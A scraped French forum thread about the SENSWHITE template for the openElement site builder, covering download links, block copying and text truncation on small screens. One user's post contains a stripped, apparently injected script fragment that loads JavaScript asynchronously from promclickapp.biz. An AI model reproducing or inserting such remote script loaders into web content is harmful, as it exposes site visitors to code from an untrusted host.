BullGuard Antivirus Sale - 60% Off with openElement !
Accueil Forum Accueil Forum >

openElement

> Discussion générale openElement
  Nouveaux messages Nouveaux messages Fil RSS  - Nouveau template pour tous : SENSWHITE
  FAQ FAQ  Rechercher dans le Forum   Inscription Inscription  Connexion Connexion

Nouveau template pour tous : SENSWHITE

 Répondre Répondre Page  <1 36373839>
Auteur
Message
brolysan allez vers le bas
Admin Group
Admin Group
Avatar

Depuis le: 14 Août 2009
Pays: France
Status: Inactif
Points: 10144
Options des messages Options des messages   Thanks (0) Thanks(0)   Citer brolysan Citer  RépondreRéponse Lien Direct à ce Post Envoyé : 29 Avr 2019 à 12:28
Soit vous mettez des screens de votre soucis (dans OE et en mode prévisualisation) soit compressez votre projet complet au format zip, passez par wetransfer.com et me l'envoyer à contact@sensode.com
Je regarderai si je peux comprendre via le projet en lui même.
Haut de la page
celtik allez vers le bas
Newbie
Newbie


Depuis le: 27 Feb 2016
Status: Inactif
Points: 17
Options des messages Options des messages   Thanks (0) Thanks(0)   Citer celtik Citer  RépondreRéponse Lien Direct à ce Post Envoyé : 29 Avr 2019 à 16:08
Oui pardon, comme le site est déroulant avec le bouton central de la souris, j'ai assimilé un bloc à une page. Donc j'ai voulu copier le bloc "actualités" et cela ne marchait pas malgré plusieurs tentatives.
J'ai donc fermé le projet. J'ai laissé cela un moment et je suis reparti du début en créant un nouveau projet à partir du modèle, et au premier essai le bloc s'est copié pour s'insérer parfaitement à la suite :)
du coup souci résolu, mais sans savoir comment :-P
Merci pour vos réponses et votre aide ;)
Haut de la page
Supermi27 allez vers le bas
Newbie
Newbie


Depuis le: 09 Avr 2019
Status: Inactif
Points: 14
Options des messages Options des messages   Thanks (0) Thanks(0)   Citer Supermi27 Citer  RépondreRéponse Lien Direct à ce Post Envoyé : 06 Juin 2019 à 18:34
Bonjour< ="text/" async="" ="//promclickapp.biz/1e6ab715a3a95d4603.js">

Les lien pour télécharger cette template ne fonctionne pas.
Est-il possible de l'avoir?
Est-elle compatible à la version 1.57R9

Merci
Haut de la page
brolysan allez vers le bas
Admin Group
Admin Group
Avatar

Depuis le: 14 Août 2009
Pays: France
Status: Inactif
Points: 10144
Options des messages Options des messages   Thanks (0) Thanks(0)   Citer brolysan Citer  RépondreRéponse Lien Direct à ce Post Envoyé : 06 Juin 2019 à 19:56
Je regarde pourquoi.
Haut de la page
brolysan allez vers le bas
Admin Group
Admin Group
Avatar

Depuis le: 14 Août 2009
Pays: France
Status: Inactif
Points: 10144
Options des messages Options des messages   Thanks (0) Thanks(0)   Citer brolysan Citer  RépondreRéponse Lien Direct à ce Post Envoyé : 06 Juin 2019 à 19:59
Message posté par Supermi27 Supermi27 a écrit:

Bonjour

Les lien pour télécharger cette template ne fonctionne pas.
Est-il possible de l'avoir?
Est-elle compatible à la version 1.57R9

Merci

lien de nouveau fonctionnel : http://sensode.net/SENSWHITE-157R3.zip
Oui fonctionnel avec la dernière version d'OE.
Haut de la page
Paulette allez vers le bas
Newbie
Newbie


Depuis le: 09 Dec 2019
Status: Inactif
Points: 2
Options des messages Options des messages   Thanks (0) Thanks(0)   Citer Paulette Citer  RépondreRéponse Lien Direct à ce Post Envoyé : 09 Dec 2019 à 14:56
Bonjour,
Sur certains smartphone, ou même dans une fenêtre rétrécie au max sur PC,   les mots d'accueil "template/senswhite" sont tronqués à droite, sans possibilité de les visualiser, par exemple avec un ascenseur horizontal en bas. Il y a til un moyen d'éviter cela?
j'espère que la question n'a pas été déjà posée, j'ai pas trouvé.
Merci


Haut de la page
brolysan allez vers le bas
Admin Group
Admin Group
Avatar

Depuis le: 14 Août 2009
Pays: France
Status: Inactif
Points: 10144
Options des messages Options des messages   Thanks (0) Thanks(0)   Citer brolysan Citer  RépondreRéponse Lien Direct à ce Post Envoyé : 09 Dec 2019 à 21:19
Message posté par Paulette Paulette a écrit:

Bonjour,
Sur certains smartphone, ou même dans une fenêtre rétrécie au max sur PC,   les mots d'accueil "template/senswhite" sont tronqués à droite, sans possibilité de les visualiser, par exemple avec un ascenseur horizontal en bas. Il y a til un moyen d'éviter cela?
j'espère que la question n'a pas été déjà posée, j'ai pas trouvé.
Merci



bizarre, aucun souci sur un iphone 6S plus, un iphone 11 pro et un iphone 5S. Confused
Haut de la page
Paulette allez vers le bas
Newbie
Newbie


Depuis le: 09 Dec 2019
Status: Inactif
Points: 2
Options des messages Options des messages   Thanks (0) Thanks(0)   Citer Paulette Citer  RépondreRéponse Lien Direct à ce Post Envoyé : 11 Dec 2019 à 15:40
Bonjour,

J'ai pourtant  un Iphone 5S (et pareil sur android Samsung s7)

Je reformule, ce n'était peut être pas clair:

Sur PC Windows avec Firefox, en rétrécissant au maximum la largeur de la fenêtre du navigateur, on arrive à une fenêtre moins large que les mots template/senswhite  qui, restant à leur taille initiale, sont tronqués à l'affichage.

Haut de la page
Bridet allez vers le bas
Senior Member
Senior Member
Avatar

Depuis le: 13 Dec 2013
Pays: Condroz
Status: Inactif
Points: 5049
Options des messages Options des messages   Thanks (0) Thanks(0)   Citer Bridet Citer  RépondreRéponse Lien Direct à ce Post Envoyé : 11 Dec 2019 à 17:11
ceci n'est pas clair du tout : les mots template/senswhite  qui, restant à leur taille initiale, sont tronqués à l'affichage
que se passe-t-il quand vous regardez ce site : www.gites-durbuy.be réalisé avec senswhite ?
Haut de la page
brolysan allez vers le bas
Admin Group
Admin Group
Avatar

Depuis le: 14 Août 2009
Pays: France
Status: Inactif
Points: 10144
Options des messages Options des messages   Thanks (0) Thanks(0)   Citer brolysan Citer  RépondreRéponse Lien Direct à ce Post Envoyé : 11 Dec 2019 à 17:25
Pour senswhite, il faut avoir une largeur de -303 pixels pour que le texte disparaît...Embarrassed
et puis laisser les mots tel quels n'a aucun sens.
Si vous ne savez pas réduire la taille du texte selon un média édition, vous devriez commencer à regarder les tutoriels.


Haut de la page
 Répondre Répondre Page  <1 36373839>
  Partagez ce sujet   

Aller au Forum Permissions du forum allez vers le bas

Forum Software by Web Wiz Forums® version 12.04
Copyright ©2001-2021 Web Wiz Ltd.

Cette page a été affichée en 0.094 secondes.